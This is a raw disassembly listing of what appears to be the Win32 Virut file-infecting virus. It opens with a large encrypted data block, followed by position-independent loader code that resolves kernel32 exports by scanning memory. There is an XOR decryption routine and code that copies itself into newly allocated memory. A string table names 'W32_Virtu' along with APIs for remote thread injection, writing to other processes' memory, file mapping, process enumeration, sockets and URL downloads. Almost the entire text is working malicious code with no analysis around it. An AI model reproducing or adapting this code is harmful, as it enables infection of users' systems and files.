		dd 9C11CE68h, 65B5385Bh, 95EAC457h, 0DC2B60Fh, 5F33C940h
		dd 7B2ACF9Ch, 8F4BB38Eh, 0FD46179Bh, 604867E0h,	0F4B9840Eh
		dd 496AA54Dh, 6B800C03h, 8F1AAEEBh, 14806D86h, 2D1C8227h
		dd 0C29B661Ch, 4B63DB43h, 0DF34D179h, 0F920227Ch, 1B837F16h
		dd 0D034D380h, 803C5F76h, 0EC777B9Ch, 97FC0AFAh, 3A1E055Bh
		dd 8A9B2059h, 44F31F46h, 87B8186Ch, 0C3DAF545h,	0A4FC22CDh
		dd 1DF50B97h, 0E8C76D8Fh, 9EAC383Eh, 9C52B7A3h,	35D7AC24h
		dd 861DC2FBh, 0A39C6915h, 7A78304Dh, 7A001023h,	385E65EEh
		dd 8E0937EEh, 0CC9793ABh, 9D84E2D6h, 587CCF82h,	2D25F89Ah
		dd 429071BDh, 0ACB938A8h, 6CCC14E8h, 47D4697Ah,	0F0FC8B85h
		dd 924B7246h, 830C2937h, 0B784DBB0h, 8DB40224h,	315DB55Ah
		dd 0A5CC398Fh, 3EFE2F19h, 2FF4823Ah, 0A1F55C42h, 0A19C4F0h
		dd 913947DCh, 3104BD86h, 5798EFC0h, 32AEA1B4h, 9741AE1Ah
		dd 2E17A4E5h, 0D40850DDh, 8C84115Bh, 0EF5CA792h, 3A79F1DBh
		dd 9BA5822Ah, 33C332D9h, 0C9328332h, 2B5FC226h,	1ECEBD79h
		dd 43E00994h, 83629DCDh, 60963CC9h, 7DA56540h, 0F69EAE98h
		dd 0F5C84417h, 365749CBh, 0FCF0B16Eh, 9E484E66h, 44FD827Dh
		dd 1E20AAFEh, 0B129BE6Bh, 6B55AC2Ah, 0D546A9F8h, 4622E34Ah
		dd 94DC6579h, 40C93302h, 0EAE375B7h, 80E0ABE1h,	0F45BD1CEh
		dd 4347A6A9h, 86F4F709h, 7B445B91h, 0F58E85FDh,	256D49A2h
		dd 0D56C4E53h, 0A01DCAh, 62985ED6h, 47DE9C86h, 9C0EC919h
		dd 2A8311FDh, 0A06B5049h, 321DA6DCh, 4DFB3A9Ah,	0B88E8E98h
		dd 26F54616h, 0B7686FA6h, 781ADC2h, 21D7E77Eh, 1828CE99h
		dd 89ABDF82h, 0FA60157Ah, 62244871h, 22FEB27Dh,	60EB8834h
		dd 0BC6FBA22h, 0D2C4E7B8h, 0C09B3948h, 170EBE97h, 0EB285F40h
		dd 67043EBEh, 0ED040CD3h, 0D316CB15h, 24614FAAh, 0B7C02424h
		dd 28703998h, 7BD201E4h, 0BE35A52Fh, 0DF67DFB2h, 2054B780h
		dd 476C25D6h, 0D3D44E70h, 0FFFC381Ah, 0EDE46C90h, 0E6680B05h
		dd 9AE0F1AFh, 0D64B24D3h, 3AEFE159h, 7A80EEE6h,	0FE51929Eh
		dd 18B0BF66h, 61044BC8h, 0A21395D1h, 953E299Fh,	0FF419F2Fh
		dd 2F66CE47h, 0FDCDB68Bh, 5E41ABA8h, 0EABB16C4h, 0E565ABA0h
		dd 0FB7BA124h, 1AB14AEDh, 0F0F02654h, 0E3B1418h, 0CC9F4422h
		dd 0D621E207h, 44C6E839h, 1045218Dh, 0F5A3925Eh, 3D1E0039h
		dd 0AADB2432h, 4DB106A6h, 628F37B9h, 3E97BE39h,	0DCBE068Ch
		dd 3A4C079Ah, 597DAA3Bh, 6E24EE63h, 2FD870AFh, 2C08ABA0h
		dd 999FC290h, 2CC894C7h, 8C5DB08Bh, 9BD512B0h, 388D5585h
		dd 79D6991Ah, 30CEA3F6h, 0D895B9B4h, 9FCB6271h,	38EC1CB9h
		dd 45728E71h, 0E1F1F6D7h, 0A3EEFB89h, 90149F2Dh, 8CFCD0F0h
		dd 0A94A5D4Ch, 7AC16A0h, 80B02B8Bh, 0E97EF9A0h,	2B551039h
		dd 0B06E7834h, 7F418CE2h, 52116EEBh, 317C9FF9h,	4CCC04E5h
		dd 0CB600710h, 6AB813D7h, 97C34DCBh, 0F5D287B7h, 703C983h
		dd 0DF4DC179h, 0B22DED74h, 0F7156BAAh, 6906437Bh, 974BEA8h
		dd 6DAD6F0Dh, 691ADA49h, 33A85CD6h, 0B0C5D2B3h,	38C5D679h
		dd 0E62014FBh, 13BEED8Eh, 837F6928h, 0D8B949A2h, 9848AEDh
		dd 0F527085Bh, 6C9A3C56h, 3D69626Dh, 0F2A027F2h, 4F564EAAh
		dd 546E512Bh, 5C682539h, 7413F5DAh, 30E28B89h, 6004D8D5h
		dd 0BB3373CAh, 0C961921Fh, 399D38EEh, 712830Dh,	0ED9D61E0h
		dd 797CBADh, 0CC3B4460h, 0F9DD0FEAh, 3FDAAA7Fh,	0B9F40406h
		dd 0D09545F1h, 2CEF9759h, 1F749CBFh, 0F428C355h, 0D72BD905h
		dd 6FC47708h, 963F5D55h, 1230B5A4h, 8ACC93B3h, 0D7885D54h
		dd 8CCB3A75h, 9AC5A254h, 0F1DDF3A1h, 0D2412C77h, 8AFC9042h
		dd 5B78E4FAh, 42921033h, 1FF749ECh, 1199F0DFh, 0E7E3FAEFh
		dd 0EA29C5AAh, 38E067D8h, 0EC5DDD58h, 87250B3h,	0D04BD1F5h
		dd 0B07585BFh, 4EE170F2h, 7B358D5Ch, 0EAA5632Bh, 5CDCF3F0h
		dd 0A665826Eh, 8041A957h
		dd 356EC702h, 8488528Eh, 0CAAE62CAh, 8A6DD067h,	0D5EC2BB9h
		dd 932E6799h, 0D0E4E546h, 91AA56AFh, 9C139555h,	8D22E6A6h
		dd 0A77A88E7h, 565D3ED8h, 0D84E0B86h, 0F6635237h, 81E97037h
		dd 0EB1D9FEh, 0B7A1E122h, 292F4EBDh, 16A864CFh,	9437453Eh
		dd 0EDD0AECDh, 0CAF084h, 633DBC94h, 0CC3E5165h,	29321E6Bh
		dd 0C0791762h, 0B402E08Dh, 1A9F9735h, 0B0C69C6Ah, 0C196CCB5h
		dd 0EE249144h, 2CD2348Dh, 0F270167Bh, 2922E6A1h, 73438957h
		dd 6C5EE742h, 0FA51B89h, 0EC5A59D0h, 5B5E9F21h,	0BB85B248h
		dd 443B9B7Eh, 0B9959236h, 0A61A6628h, 40A9C160h, 0F40AE244h
		dd 1C50C23Bh, 0F525F091h, 0EFEA8F56h, 70B168E0h, 70060E6Fh
		dd 0EA775BD3h, 7F7A05A6h, 0E2E39A6Eh, 308E39Bh,	79384A3Fh
		dd 973DFA1h, 0B8991296h, 5EDD59C6h, 99F20E77h, 36D0D3Bh
		dd 0C094F16Ch, 0A042C9C5h, 0D1933F64h, 805E4C28h, 0CD523266h
		dd 6199CA99h, 12239987h, 0EF3E959Ch, 904D9116h,	6C2DC48Eh
		dd 41A18C36h, 7972D781h, 7EA33F68h, 2FF3ED26h, 7E8DC6B5h
		dd 0DB883D57h, 0F56D3191h, 0D639AA39h, 992F9006h, 9F26E42Fh
		dd 0DC50BEF6h, 0AFF3B57Dh, 1AA6086h, 0D5D501DAh, 9F3D5A09h
		dd 0B022361Dh, 78A6D27Fh, 73BE333Ch, 806979E6h,	9A6017BCh
		dd 22F85540h, 65A6513Bh, 2D1D922Ah, 60D088C9h, 0EC46EE7Eh
		dd 0C695760Ah, 7B20473Eh, 963F97FDh, 0D9755C1Ah, 764C1A24h
		dd 0FE216F7Eh, 38D711BFh, 0DC527849h, 0B6ACA2BBh, 0E0B0A601h
		dd 0F0C1056Fh, 983EE276h, 22408756h, 4DA9209h, 0EBC82EBBh
		dd 4A2F3EFAh, 0A0779D38h, 71E298E8h, 0F435B5FCh, 5ED18097h
		dd 0A1A0B2F8h, 4A38FD92h, 72944103h, 0D9BF5560h, 0DD26AACAh
		dd 5C4907C7h, 94D06483h, 85C2DABh, 5989A1EBh, 765B2DD4h
		dd 36E9784Dh, 0DBF0318Fh, 0FB09CFF2h, 0FAA3B492h, 0AF42961Ch
		dd 6E786F2Fh, 3F70F9C4h, 0D807E0E4h, 0A3B161A1h, 0AABB4547h
		dd 0DFE443A4h, 5DE5C265h, 58468E81h, 0FD82382Ch, 0E66E249Bh
		dd 0FAC001F5h, 85EFC68Ch, 0E287FF2Fh, 696BC171h, 239ADF7Bh
		dd 0B6981486h, 13C952DAh, 9C3C0B2Eh, 98791362h,	78BB35E0h
		dd 5648DE9Dh, 649AEB7h,	0BFC6936Fh, 29C9F6B4h, 7BC3663Bh
		dd 215A8D93h, 0EAA78515h, 1083F811h, 99E2F0A5h,	7497F7h
		dd 5A65E0BFh, 492346Fh,	1238E5E2h, 95C5F6FCh, 54167CDDh
		dd 0F148249Bh, 82743B5Ch, 1E09EBE7h, 783F8BE8h,	9B3649E9h
		dd 0C1E384BFh, 8F5FE7DDh, 0F62E8202h, 406B2C45h, 419E2C09h
		dd 74EBD5ACh, 9F4CC9DAh, 0C683719Ch, 3D8EA5C2h,	0A735390Dh
		dd 5EBB0885h, 53D5AEA7h, 0D6DA46B2h, 0F66F40C9h, 2BA243DBh
		dd 4B9D6506h, 62DB50F3h, 96E4AAE7h, 0BA553ADBh,	7705AA08h
		dd 0D2A7A419h, 0DFD2DBCEh, 0F7290362h, 0BC915D10h, 958F8471h
		dd 4E0A4621h, 9101C0EFh, 8673C4A7h, 0FB5AEAF9h,	99262264h
		dd 185BC36Ah, 1A19618Fh, 3A23B5B7h, 289BC1D8h, 0B409B36h
		dd 0D7E19E24h, 0AFAA008Eh, 936E64A6h, 18FCC86Fh, 6A76E0BFh
		dd 9530A572h, 89D4E69h,	0D492BF7Fh, 0A359C434h,	3AFEAFC2h
		dd 8AC25AC1h, 8371C785h, 0EF6CA10Eh, 4FEE44D2h,	4796C839h
		dd 92B0F6B4h, 554731A8h, 6FB97E31h, 0A45D1C8Eh,	603D97A0h
		dd 0EF557EC0h, 593458C6h, 0A8FA1EE5h, 581E196Dh, 0CB973033h
		dd 3D8E3E8h, 0B0F65707h, 84B53BA0h, 316FCFB0h, 3E9FA4C9h
		dd 135D0D7Bh, 0E4F4008Dh, 1EDD2C84h, 62A0EC87h,	0A91CED23h
		dd 68B8E8ACh, 60A6D62h,	0D71AF192h, 3B45E852h, 5A3D552Fh
		dd 7BE71D4Ah, 26374E0Eh, 4F782627h, 9A8575C1h, 49723D77h
		dd 0CC692445h, 38A890DEh, 8FEDCCD4h, 73FD903Ah,	6C0C92F5h
		dd 0C960E000h, 0B550A2C0h, 325C050Bh, 0B1230CBFh, 0B6D1F19Dh
		dd 8F8B64Bh, 0DCB3ED52h, 8158968Bh, 5823D07Eh, 0B7A5C6F4h
		dd 0B6731196h, 3E923BD4h, 0BC8A3651h, 0E68BAC73h, 8293562Dh
		dd 0F1E16D18h, 9620E710h, 0AE3BBFF8h, 33D88009h, 7ED7C2C2h
		dd 0E573F7AEh, 8CAE46AFh, 0E8DEF825h, 700D24B1h, 0E57714AFh
		dd 0E9382020h, 0D67B475h, 1AF74AE2h, 15E7C612h,	1B60DBAh
		dd 65EDCF9Dh, 7C27ED8Bh, 972B6911h, 7E263BA6h, 2B0EE4Bh
		dd 68C44327h, 34C3483Dh, 7D44B8BDh, 0B0272A9Eh,	4E5E1056h
		dd 0E8B0E1CBh, 48FBB0A7h, 0A94A6B5Dh, 0A651559Ah, 0F39AFA90h
		dd 635DA89Bh, 527817AAh, 95958325h, 0E0900F3Ch,	0ED5605FEh
		dd 0C280F425h, 0A91A464h, 6FC0A894h, 0C5DF7DACh, 821B39D6h
		dd 567BC600h, 890FE938h, 0CBAF4B21h, 0F5FAE383h, 0C1E79297h
		dd 9EACE49Dh, 0B13EC24Bh, 7C45492Bh, 3AF45D1Bh,	9CF6BE69h
		dd 0C0FD21B2h, 0E6F108E6h, 3EAB0A6Ch, 0DC2EB967h, 11722C85h
		dd 9F98C42Ch, 0F87673C2h, 4783279Dh, 0EAAB5436h, 0F5288437h
		dd 0A9F812E8h, 0C88091A6h, 9F123C82h, 9E32A154h, 0C1CEDB55h
		dd 0A4FB6CDEh, 4F858414h, 76927Eh, 0B773769Dh, 22BFC051h
		dd 0D882BCC3h, 344C69B2h, 21FF9B0Ah, 0EB829FB1h, 0E69D97B8h
		dd 0F43FF6Ah, 0BDF71CF2h, 0C1A18DB2h, 90B3E8B8h, 6EF6AA08h
		dd 9C4571B1h, 21032FAFh, 0BA821FC8h, 54DF4881h,	9F3C9D34h
		dd 375CF746h, 0EB1BE428h, 43A9C40h, 0CCA94561h,	0EB4B0756h
		dd 12BBABE5h, 0A32E20F8h, 12D354D2h, 37D143F8h,	0F0889FE3h
		dd 6AE8F42h, 0CE338845h, 2AD36EECh, 0DC10F1CBh,	631C542Bh
		dd 1C1A9CA2h, 0F38E13E6h, 21F09968h, 98817029h,	35B95FBBh
		dd 0F78CC512h, 9E8730E8h, 5EC650E2h, 0E752EC61h, 0C82524F7h
		dd 7A545BB5h, 9E248B58h, 0B44A968Fh, 7F957B56h,	4BA69BB9h
		dd 3F74D666h, 76172E41h, 1F886D7Bh, 3A2A23E7h, 0A7DD755Eh
		dd 9D1884Ch, 0CB5E4818h, 2EB7430Ch, 0C6C792A8h,	7F110987h
		dd 8FF39821h, 6CEFB0D1h, 0D1360D2Eh, 0DD04DCCCh, 2CA5163Fh
		dd 15C1A60Eh, 0B9FE7945h, 1B8F8C12h, 0DF1CBF85h, 12DA0F59h
		dd 670C6BF4h, 866A3F2h,	2B2B535h, 1501C344h, 0FE0D945Dh
		dd 2F267070h, 1480A1FAh, 0E9139143h, 0D711F993h, 8BE71049h
		dd 0D3A1C1B6h, 3E0F91B0h, 30BF7F0Fh, 3D9935Fh, 9D4FFA52h
		dd 4337E9B9h, 9C0C462Dh, 13519252h, 9249C623h, 0A4266827h
		dd 4246909h, 2A82B4CBh,	0B417D86Fh, 38A80DA9h, 776E171Bh
		dd 0DF319DE9h, 0D3C06989h, 0E79475F8h, 9A4DD2FCh, 0BC5760Fh
		dd 0A32D9313h, 5B6C0CB3h, 0F32A55F9h, 0DD5439FAh, 0B79D3341h
		dd 0F2C69A1Ch, 0DCACA577h, 0AEEADE89h, 779F90F9h, 0B5EFC4ACh
		dd 0BDFDFBB8h, 44DE52h,	26FABE60h, 0E9847A86h, 7EEDAE6Fh
		dd 0D4879EE8h, 96AE2BEh, 49DDA266h, 5C3D7627h, 6DAC097Ah
		dd 9115B9BDh, 889026E5h, 0BBE2F631h, 0D4534327h, 2DCA52F9h
		dd 0CB20DF2Eh, 1723DAA0h, 0ADEAFA0Ch, 0F1309FE9h, 3386D7FDh
		dd 0B4BED012h, 7F423546h, 57E284Ch, 5AC0A6DDh, 260A265Dh
		dd 0A7802EAAh, 61AB6929h, 754F8FC6h, 57213BE9h,	0D35E2E4Bh
		dd 0DB59A13Ch, 6F94FE0Fh, 0C25F3677h, 0D31F3180h, 125CBB63h
		dd 0E6D91F4Ch, 1383164Eh, 5579DF1h, 1A243B6Bh, 2EBE4B95h
		dd 69BFFF80h, 0BD259F8Ah, 651361B8h, 988F1EDDh,	0B330E55Ch
		dd 5991A140h, 7AC72622h, 0DB8EE829h, 8CD5CBAh, 5EE34B2Ah
		dd 0B30EBED8h, 8BCA3747h, 59B9C71Bh, 9F20B4DCh,	38BC2508h
		dd 0F2B22942h, 0D31A2D22h, 1B31A580h, 79FBDC13h, 0B919B325h
		dd 0D9A4793h, 0B41A62C9h, 0FD3099FAh, 15E2FCEEh, 0FCFFB913h
		dd 0E93DCF18h, 18A15131h

; =============== S U B	R O U T	I N E =======================================


		public start

start		proc near

var_C		= dword	ptr -0Ch
var_4		= dword	ptr -4

		call	$+5
		push	ebp
		mov	ebx, [esp+8]
		mov	ebp, [esp+8+var_4]
		sub	[esp+8+var_4], 1057h
		and	ebx, 0FFFFF000h
		sub	ebp, 401005h

loc_490022:				; CODE XREF: start+3Dj
		cmp	dword ptr [ebx+4Eh], 73696854h
		jnz	short loc_490037
		mov	eax, [ebx+3Ch]
		add	eax, ebx
		cmp	word ptr [eax],	4550h
		jz	short loc_49003F

loc_490037:				; CODE XREF: start+29j
		sub	ebx, 100h
		jmp	short loc_490022
; ---------------------------------------------------------------------------

loc_49003F:				; CODE XREF: start+35j
		mov	edx, [eax+78h]
		add	edx, ebx
		mov	esi, [edx+20h]
		mov	ecx, [edx+18h]
		add	esi, ebx
		push	ecx

loc_49004D:				; CODE XREF: start:loc_490074j
		lodsd
		add	eax, ebx
		cmp	dword ptr [eax-1], 74654700h
		jnz	short loc_490074

loc_490059:				; DATA XREF: jlrllt49:0041FFC8o
					; jlrllt49:0041FFE4o
		cmp	dword ptr [eax+3], 636F7250h
		jnz	short loc_490074
		cmp	dword ptr [eax+7], 72646441h
		jnz	short loc_490074
		cmp	dword ptr [eax+0Bh], 737365h
		jz	short loc_490079

loc_490074:				; CODE XREF: start+57j	start+60j ...
		loop	loc_49004D
		pop	ecx
		pop	ebp
		retn
; ---------------------------------------------------------------------------

loc_490079:				; CODE XREF: start+72j
		sub	[esp+0Ch+var_C], ecx
		mov	esi, [edx+24h]
		pop	ecx
		add	esi, ebx
		movzx	eax, word ptr [esi+ecx*2]
		mov	edi, [edx+1Ch]
		add	edi, ebx
		mov	esi, [edi+eax*4]
		add	esi, ebx
		call	near ptr loc_49009F+2
		inc	ebx
		insb
		outsd
		jnb	short near ptr loc_4900FD+2
		dec	eax
		popa
		outsb
		db	64h
		insb

loc_49009F:				; CODE XREF: start+90p
		add	gs:[ebx-1], dl
start		endp ; sp-analysis failed

		setalc
		mov	dword ptr ss:(loc_402406+1)[ebp], eax
		call	near ptr loc_4900BB+1
		inc	ebx
		jb	short loc_490117
		popa
		jz	short loc_49011A
		inc	ebp
		jbe	short near ptr loc_49011C+1
		outsb
		jz	short near ptr loc_4900FA+2

loc_4900BB:				; CODE XREF: p9xindpz:004900AAp
		add	[ebx-1], dl
		setalc
		mov	dword ptr ss:loc_40240B[ebp], eax
		call	sub_4900D7
		inc	edi
		db	65h
		jz	short loc_49011A
		popa
		jnb	short sub_490145
		inc	ebp
		jb	short near ptr sub_490145+1
		outsd
		jb	short $+2

; =============== S U B	R O U T	I N E =======================================



sub_4900D7	proc near		; CODE XREF: p9xindpz:004900C5p

; FUNCTION CHUNK AT 00490155 SIZE 0000008D BYTES
; FUNCTION CHUNK AT 00490271 SIZE 000000DD BYTES

		push	ebx
		call	esi
		mov	dword ptr ss:(loc_40240E+1)[ebp], eax
		call	sub_49012A
		test	eax, eax
		jz	short loc_49010A
		push	eax
		call	dword ptr ss:(loc_40240E+1)[ebp]
		test	eax, eax
		jnz	short loc_490104
		lea	eax, [ebp+401155h]

loc_4900FA:				; CODE XREF: p9xindpz:004900B9j
		mov	dl, [eax-1]

loc_4900FD:				; CODE XREF: start+98j
		call	sub_490145
		jmp	short loc_490155
; ---------------------------------------------------------------------------

loc_490104:				; CODE XREF: sub_4900D7+1Bj
					; sub_4900D7+E7j ...
		call	dword ptr ss:(loc_402406+1)[ebp]

loc_49010A:				; CODE XREF: sub_4900D7+10j
		pop	ebp
		retn
sub_4900D7	endp

; ---------------------------------------------------------------------------

loc_49010C:				; CODE XREF: sub_49012A+2p
					; sub_4900D7:loc_4902E1p
		pop	edx
		push	0
		push	0
		push	0
		push	0
; ---------------------------------------------------------------------------
		db 68h,	1
; ---------------------------------------------------------------------------

loc_490117:				; CODE XREF: p9xindpz:004900B0j
		add	[eax+eax], al

loc_49011A:				; CODE XREF: p9xindpz:004900B3j
					; p9xindpz:004900CBj
		mov	eax, esp

loc_49011C:				; CODE XREF: p9xindpz:004900B6j
		push	0
		push	eax
		push	0Ch
		mov	eax, esp
		jmp	edx
; ---------------------------------------------------------------------------
		push	esi
		push	esp
		pop	edi
		xor	eax, [eax]

; =============== S U B	R O U T	I N E =======================================



sub_49012A	proc near		; CODE XREF: sub_4900D7+9p
					; p9xindpz:loc_490CDCp
		xor	ecx, ecx
		call	loc_49010C
		lea	edx, [ebp+401125h]
		push	edx
		push	ecx
		push	ecx
		push	eax
		call	dword ptr ss:loc_40240B[ebp]
		add	esp, 20h
		retn
sub_49012A	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_490145	proc near		; CODE XREF: p9xindpz:004900CFj
					; sub_4900D7:loc_4900FDp ...
		mov	dh, dl
		mov	ecx, 12B2h

loc_49014C:				; CODE XREF: sub_490145+Cj
		xor	[eax], dl
		inc	eax
		add	dl, dh
		loop	loc_49014C
		retn
sub_490145	endp

; ---------------------------------------------------------------------------
		pushf
; START	OF FUNCTION CHUNK FOR sub_4900D7

loc_490155:				; CODE XREF: sub_4900D7+2Bj
		and	dword ptr [ebp+401480h], 0
		and	dword ptr [ebp+401484h], 0
		and	dword ptr ss:loc_401488[ebp], 0
		push	edi
		mov	byte ptr [ebp+401262h],	1
		mov	dword ptr ss:loc_402413[ebp], esi
		lea	esi, loc_4014A9[ebp]
		xor	ecx, ecx
		lea	edi, (loc_402421+2)[ebp]
		mov	cl, 1Ch
		call	sub_49048C
		pop	edi
		call	ss:dword_40245B[ebp]
		shr	eax, 1Fh
		jz	loc_490271
		mov	eax, [edi+14h]
		push	40h
		add	eax, ebx
		push	8001000h
		mov	dword ptr ss:(loc_402415+6)[ebp], eax
		push	5839h
		push	0
		call	dword ptr ss:byte_40248B[ebp]
		test	eax, eax
		jz	loc_490104
		xchg	eax, edi
		lea	esi, sub_401000[ebp]
		mov	ebp, edi
		mov	ecx, 60Fh
		sub	ebp, offset sub_401000
		lea	edx, [ebp+4011E2h]
		rep movsd
		jmp	edx
; END OF FUNCTION CHUNK	FOR sub_4900D7
; ---------------------------------------------------------------------------
		sub	esp, 20h
		mov	edi, esp
		push	8
		xor	eax, eax
		pop	ecx
		lea	edx, [ebp+4018D1h]
		rep stosd
		mov	edi, esp
		mov	[edi+10h], edx
		inc	byte ptr [edi+1Ch]
		push	edi
		push	10003h
		call	dword ptr [ebp+40241Bh]
		add	esp, 20h
		test	eax, eax
		jz	loc_490104
		xchg	eax, edi
		push	0
		push	1
		push	80000400h
		push	10000h
		call	dword ptr [ebp+40241Bh]
		test	eax, eax
		jz	loc_490104
		push	0
		push	eax
		push	40000h
		push	0
		shr	eax, 0Ch
		push	edi
		push	1
		push	eax
		push	10001h
		call	dword ptr [ebp+40241Bh]
		push	1000Ah
		call	dword ptr [ebp+40241Bh]
		call	sub_490261
		jmp	loc_490104

; =============== S U B	R O U T	I N E =======================================



sub_490261	proc near		; CODE XREF: p9xindpz:00490257p
					; sub_490261+Dj
		push	1
		pop	ecx
		jecxz	short locret_490270
		push	0Ah
		call	dword ptr [ebp+402483h]
		jmp	short sub_490261
; ---------------------------------------------------------------------------

locret_490270:				; CODE XREF: sub_490261+3j
		retn
sub_490261	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4900D7

loc_490271:				; CODE XREF: sub_4900D7+C0j
		cmp	dword ptr ss:(loc_40243A+1)[ebp], 0
		jz	loc_490104
		call	near ptr loc_490288+1
		dec	esi
		push	esp
		inc	esp
		dec	esp
		dec	esp

loc_490288:				; CODE XREF: sub_4900D7+1A7p
		add	bh, bh
		xchg	eax, ebp
		dec	edi
		and	al, 40h
		add	[ebp+401637B5h], cl
		add	[ebx], dh
		leave
		lea	edi, (loc_40248F+4)[ebp]
		mov	cl, 9
		xchg	eax, ebx
		call	sub_49048C
		cmp	dword ptr ss:loc_4024B3[ebp], 0
		jz	loc_490104
		mov	eax, dword ptr ss:(loc_402494+3)[ebp]
		push	dword ptr [eax+1]
		pop	dword ptr ss:byte_4023C1[ebp]
		mov	eax, dword ptr ss:(loc_402499+2)[ebp]
		push	dword ptr [eax+1]
		pop	dword ptr ss:byte_4023C7[ebp]
		mov	ecx, dword ptr ss:(loc_40249C+3)[ebp]
		jecxz	short loc_4902E1
		push	dword ptr [ecx+1]
		pop	dword ptr ss:(loc_4023D0+4)[ebp]

loc_4902E1:				; CODE XREF: sub_4900D7+1FFj
		call	loc_49010C
		lea	edx, dword_40149F[ebp]
		push	edx
		push	5839h
		push	0
		push	4
		push	eax
		push	0FFFFFFFFh
		call	dword ptr ss:(loc_402427+4)[ebp]
		add	esp, 20h
		push	5839h
		mov	edx, esp
		push	0
		mov	ecx, esp
		push	4
		push	0
		push	2
		push	edx
		push	0
		push	5839h
		push	0
		push	ecx
		push	0FFFFFFFFh
		push	eax
		call	dword ptr ss:(locret_4024A1+2)[ebp]
		pop	edi
		pop	ecx
		test	edi, edi
		jz	loc_490104
		lea	esi, sub_401000[ebp]
		mov	ecx, 60Fh
		mov	ebp, edi
		rep movsd
		sub	ebp, offset sub_401000
		lea	eax, loc_40134E[ebp]
		jmp	eax
; END OF FUNCTION CHUNK	FOR sub_4900D7
; ---------------------------------------------------------------------------
		dw 958Dh
		dd offset loc_401785+4
		dd 6395FF52h, 0E8004024h, 16h
aLookupprivileg	db 'LookupPrivilegeValueA',0
		dw 0FF50h
		dd 40241395h, 17858900h, 50004024h, 6A206A54h, 0A795FFFFh
		dd 85004024h, 3F755FC0h, 56026A96h, 6AD48B56h, 11E85201h
		dd 53000000h, 62654465h, 72506775h, 6C697669h, 656765h
		dd 1795FF56h, 8B004024h, 565656C4h, 0FF575650h,	40249395h
		dd 10C48300h, 795FF57h,	6A004024h, 0FF026A00h, 40243B95h
		dd 128B900h, 2B970000h,	240C89E1h, 95FF5754h, 402473h
		dd 0A583F633h, 4024F7h,	0FF575400h, 40247795h, 74C08500h
		dd 0FE83465Ch, 0FFEE7204h, 6A082474h, 0FF2A6A00h, 40246F95h
		dd 74C08500h, 0E4E893DCh, 33000003h, 30E391C9h,	24F78539h
		dd 28750040h, 0C3EC181h, 54500000h, 50515650h, 95FF5350h
		dd 402433h, 7459C085h, 2474FF0Fh, 0F7858F08h, 0E8004024h
		dd 0FFFFFE09h, 795FF53h, 0EB004024h, 28C48198h,	57000001h
		dd 240795FFh, 91E90040h, 90FFFFFCh, 585858h, 1839h, 0BF4h
		dd 3 dup(0)

; =============== S U B	R O U T	I N E =======================================



sub_49048C	proc near		; CODE XREF: sub_4900D7+B1p
					; sub_4900D7+1C9p ...
		push	ecx
		push	esi
		push	ebx
		call	dword ptr ss:loc_402413[ebp]
		stosd
		pop	ecx

loc_490497:				; CODE XREF: sub_49048C+Ej
		lodsb
		test	al, al
		jnz	short loc_490497
		loop	sub_49048C
		retn
sub_49048C	endp

; ---------------------------------------------------------------------------
aW32_virtu	db 'W32_Virtu',0
aLstrlen	db 'lstrlen',0
aCreatefilea	db 'CreateFileA',0
aCreatefilemapp	db 'CreateFileMappingA',0
aCreateprocessa	db 'CreateProcessA',0
aCreateremoteth	db 'CreateRemoteThread',0
aCreatethread	db 'CreateThread',0
aCreatetoolhe_0	db 'CreateToolhelp32Snapshot',0
aExitthread	db 'ExitThread',0
aGetfileattribu	db 'GetFileAttributesA',0
aGetfilesize	db 'GetFileSize',0
aGetfiletime	db 'GetFileTime',0
aGetmodulehandl	db 'GetModuleHandleA',0
aGettempfilenam	db 'GetTempFileNameA',0
aGettemppatha	db 'GetTempPathA',0
aGetversion	db 'GetVersion',0
aGetversionexa	db 'GetVersionExA',0
aLoadlibrarya	db 'LoadLibraryA',0
aMapviewoffile	db 'MapViewOfFile',0
aOpenfilemappin	db 'OpenFileMappingA',0
aOpenprocess_0	db 'OpenProcess',0
aProcess32fir_0	db 'Process32First',0
aProcess32nex_0	db 'Process32Next',0
aSetfileattribu	db 'SetFileAttributesA',0
aSetfiletime	db 'SetFileTime',0
aSleep		db 'Sleep',0
aUnmapviewoffil	db 'UnmapViewOfFile',0
aVirtualalloc	db 'VirtualAlloc',0
aWritefile	db 'WriteFile',0
aNtadjustprivil	db 'NtAdjustPrivilegesToken',0
aNtcreatefile	db 'NtCreateFile',0
aNtcreateproces	db 'NtCreateProcess',0
aNtcreateproc_0	db 'NtCreateProcessEx',0
aNtmapviewofsec	db 'NtMapViewOfSection',0
aNtopenprocesst	db 'NtOpenProcessToken',0
aNtprotectvirtu	db 'NtProtectVirtualMemory',0
aNtwritevirtual	db 'NtWriteVirtualMemory',0
aRtlunicodestri	db 'RtlUnicodeStringToAnsiString',0
aWsastartup	db 'WSAStartup',0
aClosesocket	db 'closesocket',0
aConnect	db 'connect',0
aGethostbyname	db 'gethostbyname',0
aRecv		db 'recv',0
aSend		db 'send',0
aSocket		db 'socket',0
aInternetcloseh	db 'InternetCloseHandle',0
aInternetgetcon	db 'InternetGetConnectedState',0
aInternetopena	db 'InternetOpenA',0
aInternetopenur	db 'InternetOpenUrlA',0
aInternetreadfi	db 'InternetReadFile',0
aAdvapi32_dll	db 'ADVAPI32.DLL',0
aRegclosekey	db 'RegCloseKey',0
aRegopenkeyexa	db 'RegOpenKeyExA',0
aRegqueryvaluee	db 'RegQueryValueExA',0
aRegsetvalueexa	db 'RegSetValueExA',0

; =============== S U B	R O U T	I N E =======================================



sub_4907D0	proc near		; CODE XREF: p9xindpz:00490873p
					; p9xindpz:00490884p ...

var_5		= byte ptr -5

		sub	ecx, 5
		sub	ecx, eax
		push	ecx
		push	0E8000000h
		lea	ecx, [esp+8+var_5]
		push	0
		push	5
		push	ecx
		push	eax
		push	ebx
		push	5
		mov	ecx, esp
		push	eax
		mov	edx, esp
		push	eax
		push	esp
		push	40h
		push	ecx
		push	edx
		push	ebx
		call	dword ptr ss:loc_4024AB[ebp]
		add	esp, 0Ch
		call	dword ptr [ebp+4024AFh]
		add	esp, 8
		retn
sub_4907D0	endp

; ---------------------------------------------------------------------------
		push	edi
		lea	eax, dword_40149F[ebp]
		xor	edi, edi
		push	eax
		push	0
		push	6
		call	dword ptr [ebp+40246Bh]
		test	eax, eax
		jz	short loc_49089E
		push	eax
		push	5839h
		mov	edx, esp
		push	0
		mov	ecx, esp
		push	4
		push	100000h
		push	2
		push	edx
		push	0
		push	5839h
		push	0
		push	ecx
		push	ebx
		push	eax
		call	dword ptr [ebp+4024A3h]
		pop	edi
